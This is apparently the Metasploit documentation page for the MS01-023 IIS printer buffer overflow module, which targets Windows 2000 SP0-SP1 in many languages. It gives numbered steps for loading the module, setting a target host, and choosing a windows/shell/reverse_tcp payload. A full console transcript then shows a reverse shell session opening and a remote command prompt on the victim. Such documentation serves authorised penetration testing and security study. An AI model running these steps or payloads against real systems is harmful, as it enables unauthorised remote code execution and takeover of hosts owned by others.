
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/iis/ms01_023_printer.md

Vulnerable Application

This module exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. It works against Windows 2000 Server and Professional SP0-SP1.

If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.

This module has been tested successfully on:

  • Windows 2000 Professional SP0 (Dutch)

  • Windows 2000 Professional SP0 (Finnish)

  • Windows 2000 Professional SP0 (Greek)

  • Windows 2000 Professional SP0 (Korean)

  • Windows 2000 Professional SP0 (Turkish)

  • Windows 2000 Professional SP1 (Arabic)

  • Windows 2000 Professional SP1 (Czech)

  • Windows 2000 Professional SP1 (English)

  • Windows 2000 Professional SP1 (Greek)

  • Windows 2000 Server SP0 (Chinese)

  • Windows 2000 Server SP0 (Dutch)

  • Windows 2000 Server SP0 (English)

  • Windows 2000 Server SP0 (German)

  • Windows 2000 Server SP0 (Hungarian)

  • Windows 2000 Server SP0 (Italian)

  • Windows 2000 Server SP0 (Portuguese)

  • Windows 2000 Server SP0 (Spanish)

  • Windows 2000 Server SP0 (Turkish)

  • Windows 2000 Server SP1 (English)

  • Windows 2000 Server SP1 (French)

  • Windows 2000 Server SP1 (Swedish)

Verification Steps

  1. use exploit/windows/iis/ms01_023_printer

  2. set RHOSTS [IP]

  3. show targets to see the possible targets

  4. set TARGET [TARGET]

  5. set PAYLOAD windows/shell/reverse_tcp

  6. set LHOST [IP]

  7. run

Options

Scenarios

Windows 2000 Professional SP1 (EN)

```
msf6 > use exploit/windows/iis/ms01_023_printer
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_023_printer) > set rhosts 192.168.200.195
rhosts => 192.168.200.195
msf6 exploit(windows/iis/ms01_023_printer) > check
[*] 192.168.200.195:80 - The target appears to be vulnerable.
msf6 exploit(windows/iis/ms01_023_printer) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP1 (Arabic)
   1   Windows 2000 SP0-SP1 (Czech)
   2   Windows 2000 SP0-SP1 (Chinese)
   3   Windows 2000 SP0-SP1 (Dutch)
   4   Windows 2000 SP0-SP1 (English)
   5   Windows 2000 SP0-SP1 (French)
   6   Windows 2000 SP0-SP1 (Finnish)
   7   Windows 2000 SP0-SP1 (German)
   8   Windows 2000 SP0-SP1 (Korean)
   9   Windows 2000 SP0-SP1 (Hungarian)
   10  Windows 2000 SP0-SP1 (Italian)
   11  Windows 2000 SP0-SP1 (Portuguese)
   12  Windows 2000 SP0-SP1 (Spanish)
   13  Windows 2000 SP0-SP1 (Swedish)
   14  Windows 2000 SP0-SP1 (Turkish)
   15  Windows 2000 Pro SP0 (Greek)
   16  Windows 2000 Pro SP1 (Greek)

msf6 exploit(windows/iis/ms01_023_printer) > set target 4
target => 4
msf6 exploit(windows/iis/ms01_023_printer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_023_printer) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_023_printer) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using target: Windows 2000 SP0-SP1 (English) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.195
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1168) at 2022-07-08 11:07:42 -0400

Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----

C:\WINNT\system32>ver
ver

Microsoft Windows 2000 [Version 5.00.2195]
```